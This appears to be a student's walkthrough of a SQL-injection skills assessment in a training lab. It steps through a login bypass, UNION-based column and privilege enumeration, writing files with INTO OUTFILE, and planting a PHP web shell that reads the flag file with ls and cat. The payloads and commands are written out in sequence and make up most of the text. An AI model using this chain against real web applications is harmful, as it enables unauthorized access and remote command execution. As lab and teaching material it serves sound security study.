Skills Assessment

admin' or '1'='1
admin' or '1'='1'
admin' or '1'='1'--
admin' or '1'='1'-- -

Luckly we didn't have to spend much time building up the payload, and with the admin' or '1'='1'-- - we manage to bypass the authentication page.

Now, the objective is to have access to root directory of the file system. Since we confirm the web application is vulnerable to SQL injection, let's try to exploit the search field with a single quote (') and see if we got any errors.

The search field is also indeed vulnerable to SQL Injection. What we can now try to do is try to find how many columns is the query accepting. We can try ' ORDER BY 1-- - and increasing the number until we get an error:

' ORDER BY 1-- -

When we reach ' ORDER BY 6-- - the message above is returned, so we can assume the DB has 5 columns.

To prove our theory let's use the following query

' UNION select 1,2,3,4,5-- -

We got no errors and we got a new line

The number 1 is omitted. This may be the column used for the PRIMARY KEY, and in order to execute functions in our queries we must assure what column can return the information.

' UNION select 1,@@version,3,4,5-- -

By placing the @@version in the column two, we now where to except the results to be returned.

Now, since our goal is to list a file in the root directory, we can skip listing the DB tables. Let's check what is the current user and what kind of permissions that our current user has.

' UNION SELECT 1, user, 3, 4, 5 from mysql.user-- -

As we can see from the result abobe, the current user is root.

' UNION SELECT 1, super_priv, 3, 4, 5 from mysql.user-- -

To move to the next step, we must first ensure that our current user has superuser privileges. The 'Y' in column two confirms it.

Since we have superuser privileges, we should be fine writing into to the server. But if we try to write a file in 'var/www/html/' directory we'll get the "Permission denied" message, so what we should do is writing at the folder 'var/www/html/dashboard/'.

' UNION SELECT 1,'This is a test!', 3, 4, 5 INTO OUTFILE '/var/www/html/dashboard/test.txt'-- -

When accessing the /dashboard/test.txt we can see the output of the file we just created.

Now that we confirmed we can successfully write files into the server, we can write a web shell in order to send commands to the server.

' UNION SELECT 1,'',3,4,5 INTO OUTFILE '/var/www/html/dashboard/shell.php'-- -

When accessing the endpoint we must ensure we type shell.php?0=[command].

http://SERVER_IP:PORT/dashboard/shell.php?0=ls

In this case, by using the ls command we can list the files of the current directory.

http://SERVER_IP:PORT/dashboard/shell.php?0=ls ../../../../../

Navigating to the back using ls ../../../../../ we can see file that looks our flag.

http://SERVER_IP:PORT/dashboard/shell.php?0=cat ../../../../../flag_xxxxxxxxxxxx.txt

Issuing the cat command we successfully found our flag!

This was a very insightful and fun section to complete. Hope this walk-through was helpful, see you on the next one!